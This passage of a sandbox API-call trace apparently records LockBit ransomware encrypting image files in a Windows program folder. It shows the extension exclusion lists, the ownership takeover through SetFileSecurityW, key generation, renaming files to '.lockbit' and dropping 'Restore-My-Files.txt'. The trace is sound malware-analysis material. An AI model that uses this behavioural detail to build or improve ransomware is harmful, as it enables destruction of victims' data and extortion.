ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eec5c7e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x75ba, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Heart_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0080.882] lstrcmpiW (lpString1=".", lpString2="Heart_ButtonGraphic.png") returned -1 [0080.882] lstrcmpiW (lpString1="..", lpString2="Heart_ButtonGraphic.png") returned -1 [0080.882] PathFindExtensionW (pszPath="Heart_ButtonGraphic.png") returned=".png" [0080.882] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.882] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.882] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.882] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.882] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.882] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.883] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.883] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.883] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.883] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.884] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.884] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.884] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.884] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.884] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.884] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.884] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.884] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.884] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.884] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.884] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.884] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.884] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.884] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.884] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.885] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.885] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.885] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.885] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.885] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.885] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.885] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.885] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Heart_ButtonGraphic.png") returned 1 [0080.885] lstrcmpiW (lpString1="ntldr", lpString2="Heart_ButtonGraphic.png") returned 1 [0080.885] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Heart_ButtonGraphic.png") returned 1 [0080.885] lstrcmpiW (lpString1="bootsect.bak", lpString2="Heart_ButtonGraphic.png") returned -1 [0080.885] lstrcmpiW (lpString1="autorun.inf", lpString2="Heart_ButtonGraphic.png") returned -1 [0080.885] lstrcmpiW (lpString1="thumbs.db", lpString2="Heart_ButtonGraphic.png") returned 1 [0080.885] lstrcmpiW (lpString1="iconcache.db", lpString2="Heart_ButtonGraphic.png") returned 1 [0080.885] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.885] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned=".png" [0080.885] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.885] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.885] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.886] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.886] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.887] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.887] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.887] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.887] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.887] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.887] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.887] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.lockbit") returned 76 [0080.887] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.892] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.892] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.892] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.892] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.893] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.893] RtlFreeAnsiString (AnsiString="\\") [0080.893] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b4) returned 0x0 [0080.893] malloc (_Size=0x200) returned 0x77d800 [0080.893] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.893] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.893] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.893] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.894] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.894] CloseHandle (hObject=0x3b4) returned 1 [0080.894] free (_Block=0x77d800) [0080.894] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0080.894] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.894] malloc (_Size=0x40068) returned 0x3df0008 [0080.894] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=30138) returned 1 [0080.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.895] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0080.895] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.896] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0080.896] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0080.898] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.898] malloc (_Size=0xae) returned 0x77d800 [0080.898] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xae, FileInformationClass=0xa) returned 0x0 [0080.899] free (_Block=0x77d800) [0080.899] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.899] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.899] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.899] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea2923b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea2923b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="heart_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0080.899] lstrcmpiW (lpString1=".", lpString2="heart_glass_Thumbnail.bmp") returned -1 [0080.899] lstrcmpiW (lpString1="..", lpString2="heart_glass_Thumbnail.bmp") returned -1 [0080.899] PathFindExtensionW (pszPath="heart_glass_Thumbnail.bmp") returned=".bmp" [0080.899] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0080.899] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0080.899] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0080.901] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0080.901] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0080.901] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0080.901] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0080.902] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0080.902] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="heart_glass_Thumbnail.bmp") returned 1 [0080.903] lstrcmpiW (lpString1="ntldr", lpString2="heart_glass_Thumbnail.bmp") returned 1 [0080.903] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="heart_glass_Thumbnail.bmp") returned 1 [0080.903] lstrcmpiW (lpString1="bootsect.bak", lpString2="heart_glass_Thumbnail.bmp") returned -1 [0080.903] lstrcmpiW (lpString1="autorun.inf", lpString2="heart_glass_Thumbnail.bmp") returned -1 [0080.903] lstrcmpiW (lpString1="thumbs.db", lpString2="heart_glass_Thumbnail.bmp") returned 1 [0080.903] lstrcmpiW (lpString1="iconcache.db", lpString2="heart_glass_Thumbnail.bmp") returned 1 [0080.903] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.903] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned=".bmp" [0080.903] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0080.903] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0080.903] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0080.903] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0080.903] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0080.903] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0080.903] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0080.903] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0080.903] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0080.903] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0080.903] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0080.903] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0080.903] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0080.904] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0080.904] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp.lockbit") returned 78 [0080.904] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.905] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.905] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.905] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.905] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.906] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.906] RtlFreeAnsiString (AnsiString="\\") [0080.906] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3c0) returned 0x0 [0080.906] malloc (_Size=0x200) returned 0x77d800 [0080.906] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.906] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.906] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.906] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.907] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.907] CloseHandle (hObject=0x3c0) returned 1 [0080.907] free (_Block=0x77d800) [0080.907] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0080.907] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.907] malloc (_Size=0x40068) returned 0x1ff1e60 [0080.908] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5072) returned 1 [0080.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0080.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.909] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0080.909] ReadFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.914] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.914] malloc (_Size=0xb2) returned 0x77d800 [0080.914] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xb2, FileInformationClass=0xa) returned 0x0 [0080.915] free (_Block=0x77d800) [0080.915] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.915] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.915] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.915] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eec5c7e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eec5c7e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1278, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Heart_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0080.915] lstrcmpiW (lpString1=".", lpString2="Heart_SelectionSubpicture.png") returned -1 [0080.915] lstrcmpiW (lpString1="..", lpString2="Heart_SelectionSubpicture.png") returned -1 [0080.915] PathFindExtensionW (pszPath="Heart_SelectionSubpicture.png") returned=".png" [0080.915] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.915] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.915] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.916] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".mpa", 